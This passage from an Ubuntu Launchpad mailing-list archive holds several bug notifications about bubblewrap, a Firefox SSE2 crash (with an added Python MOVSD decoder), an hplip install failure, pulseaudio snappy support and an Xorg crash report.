Jamie Bennett, the security team and various stakeholders to unblock this
MIR. The security team will prioritize this MIR for 18.10. Assuming it
passes review, I would encourage the Ubuntu Desktop team to SRU this back
to at least 18.04 LTS so users can benefit from the sandboxing feature.

** Changed in: bubblewrap (Ubuntu)
     Assignee: Ubuntu Security Team (ubuntu-security) => Seth Arnold (seth-arnold)

** Changed in: bubblewrap (Ubuntu)
       Status: Confirmed => Triaged

** Changed in: bubblewrap (Ubuntu)
   Importance: Undecided => High

-- 
https://bugs.launchpad.net/bugs/1709164

Title:
  [MIR] bubblewrap

Status in bubblewrap package in Ubuntu:
  Triaged
[Desktop-packages] [Bug 1697800] Re: [regression] firefox dies with SIGILL on machines without SSE2
** Changed in: firefox (Ubuntu)
     Assignee: Canonical Security Team (canonical-security) => Ubuntu Security Team (ubuntu-security)

-- 
https://bugs.launchpad.net/bugs/1697800

Title:
  [regression] firefox dies with SIGILL on machines without SSE2

Status in firefox package in Ubuntu:
  Confirmed

Bug description:
  I'm running Ubuntu 16.04 on an old laptop. Firefox used to work fine
  until I did an 'apt upgrade'.

  Worked: 50.1.0+build2-0ubuntu0.16.04.1
  Fails:  53.0.3+build1-0ubuntu0.16.04.2

  The bug was a little tricky to track down since AppArmor was killing
  firefox. I believe the AppArmor error is irrelevant for this bug
  report, but I mention it for completeness (and so other people can
  google for this problem):

    "/usr/bin/python3: error while loading shared libraries: cannot apply additional memory protection after relocation: Permission denied"

  I disabled AppArmor (aa-disable '/usr/lib/firefox/firefox{,*[^s][^h]}')
  and now Firefox dies like so:

    ExceptionHandler::GenerateDump cloned child 14258
    ExceptionHandler::SendContinueSignalToChild sent continue signal to child
    ExceptionHandler::WaitForContinueSignal waiting for continue signal...
    Failed to open curl lib from binary, use libcurl.so instead

  Using gdb to figure it out, I see that the process is getting SIGILL
  (Illegal Instruction). To figure out exactly which instruction is the
  problem, I ran gdb as follows:

    $ gdb /usr/lib/firefox/firefox
    GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.04) 7.11.1
    [...]
    Reading symbols from /usr/lib/firefox/firefox...(no debugging symbols found)...done.
    (gdb) set disassemble-next-line on
    (gdb) run
    Starting program: /usr/lib/firefox/firefox
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
    [New Thread 0xb15c4b40 (LWP 14296)]
    [Thread 0xb15c4b40 (LWP 14296) exited]
    warning: Corrupted shared library list: 0xb794cc00 != 0xb794b800
    [...]

    Thread 1 "firefox" received signal SIGILL, Illegal instruction.
    0x4b9f826c in ?? ()
    => 0x4b9f826c:  f2 0f 11 74 24 30       movsd  %xmm6,0x30(%esp)

  MOVSD is an SSE2 instruction, which my machine does not support.

    $ grep flags /proc/cpuinfo
    flags           : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pse36 mmx fxsr sse

  I had been under the impression that firefox is supposed to only use
  SSE2 if it is available. Is that not correct? It certainly used to
  work. Perhaps there is something wrong in how Ubuntu is building the
  binary.

  [Side note: There are actually two "movsd" instructions for the Intel
  x86 architecture. The original one (Move String, opcode A5) is
  supported by everything back to the 80386, but this one (Move Scalar,
  opcode F2 0F 11) requires SSE2. Maybe that is the source of the
  confusion.]

  Thank you.

    $ lsb_release -rd
    Description:    Ubuntu 16.04.2 LTS
    Release:        16.04

    $ apt-cache policy firefox
    firefox:
      Installed: 53.0.3+build1-0ubuntu0.16.04.2
      Candidate: 53.0.3+build1-0ubuntu0.16.04.2
      Version table:
     *** 53.0.3+build1-0ubuntu0.16.04.2 500
            500 http://us.archive.ubuntu.com/ubuntu xenial-updates/main i386 Packages
            500 http://security.ubuntu.com/ubuntu xenial-security/main i386 Packages
            100 /var/lib/dpkg/status
         45.0.2+build1-0ubuntu1 500
            500 http://us.archive.ubuntu.com/ubuntu xenial/main i386 Packages
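The reporter's diagnosis has two checkable parts: whether the CPU advertises sse2 in /proc/cpuinfo, and whether the faulting bytes encode the SSE2 scalar MOVSD (F2 0F 11 /r) rather than the string-move MOVSD (opcode A5). The Python below is an added example for this page, not part of the bug report or of Firefox; the cpuinfo fragment is constructed to match the flag list quoted above, and the decoder is an assumption that covers only the ModRM/SIB forms used in 32-bit addressing.

```python
from typing import Dict, Set, Tuple

# Constructed /proc/cpuinfo fragment carrying the flag set quoted in the report
# (SSE present, SSE2 absent).
CPUINFO_NO_SSE2 = """\
processor\t: 0
vendor_id\t: GenuineIntel
flags\t\t: fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pse36 mmx fxsr sse
"""

# The six bytes gdb showed at the faulting address in the report.
FAULTING_BYTES = bytes.fromhex("f20f11742430")

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def cpu_flags(cpuinfo_text: str) -> Set[str]:
    """Flags of the first processor entry in a /proc/cpuinfo dump."""
    for line in cpuinfo_text.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "flags":
            return set(value.split())
    return set()


def _disp(code: bytes, pos: int, size: int) -> Tuple[int, int]:
    return int.from_bytes(code[pos:pos + size], "little", signed=True), pos + size


def _modrm_operand(code: bytes, pos: int) -> Tuple[int, str, int]:
    """Decode ModRM (+SIB, +displacement) for 32-bit addressing.
    Returns (reg field, AT&T operand text, index of the next byte)."""
    modrm = code[pos]
    pos += 1
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if mod == 3:
        return reg, f"%xmm{rm}", pos
    base = index = None
    scale, disp = 1, 0
    if rm == 4:  # SIB byte follows
        sib = code[pos]
        pos += 1
        scale = 1 << (sib >> 6)
        idx, b = (sib >> 3) & 7, sib & 7
        index = None if idx == 4 else REG32[idx]
        if b == 5 and mod == 0:
            disp, pos = _disp(code, pos, 4)  # no base register, disp32 only
        else:
            base = REG32[b]
    elif rm == 5 and mod == 0:
        disp, pos = _disp(code, pos, 4)      # absolute disp32
    else:
        base = REG32[rm]
    if mod == 1:
        disp, pos = _disp(code, pos, 1)
    elif mod == 2:
        disp, pos = _disp(code, pos, 4)
    text = ""
    if disp or (base is None and index is None):
        text = hex(disp) if disp >= 0 else "-" + hex(-disp)
    if base is not None or index is not None:
        inner = f"%{base}" if base else ""
        if index:
            inner += f",%{index},{scale}"
        text += f"({inner})"
    return reg, text, pos


def decode_movsd(code: bytes) -> Dict[str, object]:
    """Tell apart the two x86 instructions that are both spelled 'movsd'."""
    if code[:1] == b"\xa5":
        return {"text": "movsd (string move, opcode A5)", "sse2": False, "length": 1}
    if code[:2] == b"\xf2\x0f" and len(code) > 2 and code[2] in (0x10, 0x11):
        reg, operand, end = _modrm_operand(code, 3)
        xmm = f"%xmm{reg}"
        # 0F 10 loads xmm from xmm/m64, 0F 11 stores xmm to xmm/m64; AT&T order is src,dst.
        text = f"movsd {operand},{xmm}" if code[2] == 0x10 else f"movsd {xmm},{operand}"
        return {"text": text, "sse2": True, "length": end}
    raise ValueError("not a movsd encoding")


def would_sigill(code: bytes, cpuinfo_text: str) -> bool:
    """True when the instruction needs SSE2 and the CPU does not advertise it."""
    return bool(decode_movsd(code)["sse2"]) and "sse2" not in cpu_flags(cpuinfo_text)


if __name__ == "__main__":
    d = decode_movsd(FAULTING_BYTES)
    print(d["text"], "| needs SSE2:", d["sse2"])
    print("would SIGILL on the reported CPU:", would_sigill(FAULTING_BYTES, CPUINFO_NO_SSE2))
```

On a real machine the cpuinfo text comes from reading /proc/cpuinfo and the bytes from `x/6xb $pc` in gdb; the decoder reproduces gdb's `movsd %xmm6,0x30(%esp)` for the quoted bytes, which confirms the faulting instruction is the SSE2 form and not the string move.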
[Desktop-packages] [Bug 1781986] Re: package ufw 0.35-5 failed to install/upgrade: los disparadores han entrado en bucle, abandonando
** Package changed: ufw (Ubuntu) => hplip (Ubuntu)

** Changed in: hplip (Ubuntu)
       Status: New => Fix Released

-- 
https://bugs.launchpad.net/bugs/1781986

Title:
  package ufw 0.35-5 failed to install/upgrade: los disparadores han
  entrado en bucle, abandonando

Status in hplip package in Ubuntu:
  Fix Released

Bug description:
  I was trying to upgrade and this message shows up.

  Leyendo lista de paquetes... Hecho
  Creando árbol de dependencias
  Leyendo la información de estado... Hecho
  0 actualizados, 0 nuevos se instalarán, 0 para eliminar y 0 no actualizados.
  9 no instalados del todo o eliminados.
  Se utilizarán 0 B de espacio de disco adicional después de esta operación.
  Configurando python3 (3.6.5-3ubuntu1) ...
  running python rtupdate hooks for python3.6...
  E: py3compile:183: cannot create directory /usr/share/hplip/ui5/__pycache__: FileNotFoundError(2, 'No such file or directory')
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/aboutdialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/aboutdialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/aligndialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/aligndialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/cleandialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/cleandialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/colorcaldialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/colorcaldialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/devicesetupdialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/devicesetupdialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/deviceuricombobox.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/devmgr5.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/devmgr5_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/devmgr_ext.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/fabgrouptable.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/fabnametable.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/fabwindow.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/fabwindow_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/faxsetupdialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/faxsetupdialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/filetable.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/firmwaredialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/firmwaredialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/infodialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/infodialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/linefeedcaldialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/linefeedcaldialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/loadpapergroupbox.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/makecopiesdialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/makecopiesdialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/mimetypesdialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/mimetypesdialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/nodevicesdialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/nodevicesdialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/plugindiagnose.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/plugindiagnose_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/plugindialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/plugindialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/pluginlicensedialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/pluginlicensedialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/pqdiagdialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/pqdiagdialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printdialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printdialog_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printernamecombobox.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printsettings_base.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printsettingsdialog.py'
  [Errno 2] No such file or directory: '/usr/share/hplip/ui5/printsettingsdialog_base.py
[Desktop-packages] [Bug 1781428] Re: pulseaudio built with --enable-snappy but 'Enable Snappy support: no'
We can't just enable the patches any more because it will change how
snaps that plug 'pulseaudio' will work. Put concretely, the patches are
meant to detect if the connecting process is a snap and if it is,
unconditionally deny recording. Some snaps that 'plugs: [ pulseaudio ]'
have legitimate use for audio recording, such as the chromium and firefox
snaps for Google Meet, etc. If these patches all of a sudden were fixed,
then snaps like firefox and chromium would no longer be able to record
audio.

While Ubuntu will end up patching pulseaudio in some way to support
record mediation, it won't be with these patches. This is being discussed
in https://forum.snapcraft.io/t/pulseaudio-recording/6361. If you have
experience with pulseaudio and are interested in the upcoming changes,
please keep an eye on the forum (and ideally participate in the
conversation). Thanks!

-- 
https://bugs.launchpad.net/bugs/1781428

Title:
  pulseaudio built with --enable-snappy but 'Enable Snappy support: no'

Status in pulseaudio package in Ubuntu:
  Incomplete

Bug description:
  From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic-amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz:

  ...
  dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf
  ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf
  ...
  Enable Ubuntu trust store: no
  Enable Snappy support:     no
  Enable Apparmor:           yes

  At this point, the patch should probably be dropped, otherwise
  applications like chromium, etc will no longer be able to record.
[Desktop-packages] [Bug 1781428] [NEW] pulseaudio built with --enable-snappy but 'Enable Snappy support: no'
Public bug reported:

From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic-amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz:

...
dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf
./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf
...
Enable Ubuntu trust store: no
Enable Snappy support:     no
Enable Apparmor:           yes

At this point, the patch should probably be dropped, otherwise
applications like chromium, etc will no longer be able to record.

** Affects: pulseaudio (Ubuntu)
     Importance: Undecided
         Status: New

** Description changed:

  From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic-amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz:
  
  ...
  dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf
- ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf
+ ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf
  ...
- Enable Ubuntu trust store: no
- Enable Snappy support: no
- Enable Apparmor: yes
+ Enable Ubuntu trust store: no
+ Enable Snappy support:     no
+ Enable Apparmor:           yes
+ 
+ 
+ 
  At this point, the patch should probably be dropped, otherwise
  applications like chromium, etc will no longer be able to record.

-- 
https://bugs.launchpad.net/bugs/1781428

Title:
  pulseaudio built with --enable-snappy but 'Enable Snappy support: no'

Status in pulseaudio package in Ubuntu:
  New
[Desktop-packages] [Bug 1760104] Re: Xorg crashed with SIGSEGV
So, the pauses I am experiencing are likely due to simply the fact that
the keyboards and mice are being removed then added back, which is a
different issue than the crashes (which appear nvidia related). I will
likely create a PR to only trigger the input subsystem on an as-needed
basis to reduce the annoying pauses we see during refreshes.

Alan reported back on irc that the for loop did *not* trigger the crash
which is good for snapd.

Looking at the error reports, both are in the /usr/lib/xorg/Xorg binary:

* https://errors.ubuntu.com/bucket/?id=/usr/lib/xorg/Xorg%3A11%3Axf86ReadInput%3AInputReady%3Aospoll_wait%3AInputThreadDoWork%3Astart_thread
* https://errors.ubuntu.com/bucket/?id=/usr/lib/xorg/Xorg%3A11%3Amain_arena%3AInputReady%3Aospoll_wait%3AInputThreadDoWork%3Astart_thread

which have numerous reports. I'm going to mark the 'snapd' task as
invalid since while it may aggravate the issue, Xorg is clearly the
problem.

** Changed in: snapd
       Status: New => Invalid

** Also affects: xorg-server (Ubuntu)
   Importance: Undecided
       Status: New

-- 
https://bugs.launchpad.net/bugs/1760104

Title:
  Xorg crashed with SIGSEGV

Status in snapd:
  Invalid
Status in nvidia-graphics-drivers package in Ubuntu:
  Confirmed
Status in xorg-server package in Ubuntu:
  New

Bug description:
  Installed a snap, immediately after I installed it, the machine froze
  and then x crashed.

  ProblemType: Crash
  DistroRelease: Ubuntu 18.04
  Package: xserver-xorg-core 2:1.19.6-1ubuntu3
  ProcVersionSignature: Ubuntu 4.15.0-13.14-generic 4.15.10
  Uname: Linux 4.15.0-13-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair nvidia_modeset nvidia
  .proc.driver.nvidia.gpus..01.00.0: Error: [Errno 21] Is a directory: '/proc/driver/nvidia/gpus/:01:00.0'
  .proc.driver.nvidia.registry: Binary: ""
  .proc.driver.nvidia.version:
   NVRM version: NVIDIA UNIX x86_64 Kernel Module  390.42  Sat Mar  3 04:10:22 PST 2018
   GCC version:  gcc version 7.3.0 (Ubuntu 7.3.0-12ubuntu1)
  .proc.driver.nvidia.warnings.fbdev:
   Your system is not currently configured to drive a VGA console on the primary VGA device. The NVIDIA Linux graphics driver requires the use of a text-mode VGA console. Use of other console drivers including, but not limited to, vesafb, may result in corruption and stability problems, and is not supported.
  .tmp.unity_support_test.0:
  ApportVersion: 2.20.9-0ubuntu2
  Architecture: amd64
  CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: compiz
  CompositorUnredirectDriverBlacklist: '(nouveau|Intel).*Mesa 8.0'
  CompositorUnredirectFSW: true
  Date: Fri Mar 30 14:15:35 2018
  Disassembly: => 0x7f6b0008: Cannot access memory at address 0x7f6b0008
  DistUpgraded: Fresh install
  DistroCodename: bionic
  DistroVariant: ubuntu
  ExecutablePath: /usr/lib/xorg/Xorg
  GraphicsCard:
   NVIDIA Corporation GM204M [GeForce GTX 980M] [10de:13d7] (rev a1) (prog-if 00 [VGA controller])
     Subsystem: CLEVO/KAPOK Computer GM204M [GeForce GTX 980M] [1558:6541]
  InstallationDate: Installed on 2018-02-13 (44 days ago)
  InstallationMedia: Ubuntu 16.04.3 LTS "Xenial Xerus" - Release amd64 (20170801)
  MachineType: Notebook P65_P67RGRERA
  ProcCmdline: /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keeptty -verbose 3
  ProcEnviron:
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-13-generic root=UUID=d6c2bf6a-9191-40b5-b3f5-ce493dcdec01 ro quiet splash vt.handoff=1
  SegvAnalysis:
   Segfault happened at: 0x7f6b0008: Cannot access memory at address 0x7f6b0008
   PC (0x7f6b0008) not located in a known VMA region (needed executable region)!
   Stack memory exhausted (SP below stack segment)
  SegvReason: executing unknown VMA
  Signal: 11
  SourcePackage: nvidia-graphics-drivers
  StacktraceTop:
   () () () ()
   start_thread (arg=0x7f6b3c98b700) at pthread_create.c:463
  Title: Xorg crashed with SIGSEGV
  UpgradeStatus: No upgrade log present (probably fresh install)
  UserGroups: adm cdrom dip lpadmin plugdev sambashare sudo
  dmi.bios.date: 01/27/2016
  dmi.bios.vendor: American Megatrends Inc.
  dmi.bios.version: 1.05.13
  dmi.board.asset.tag: Tag 12345
  dmi.board.name: P65_P67RGRERA
  dmi.board.vendor: Notebook
  dmi.board.version: Not Applicable
  dmi.chassis.asset.tag: No Asset Tag
  dmi.chassis.type: 10
  dmi.chassis.vendor: Notebook
  dmi.chassis.version: N/A
  dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr1.05.13:bd01/27/2016:svnNotebook:pnP65_P67RGRERA:pvrNotApplicable:rvnNotebook:rnP65_P67RGRERA:rvrNotApplicable:cvnNotebook:ct10:cvrN/A:
  dmi.product.family: Not Applicable
  dmi.product.name: P65_P67RGRERA
  dmi.product.version: Not Applicable
  dmi.sys.vendor: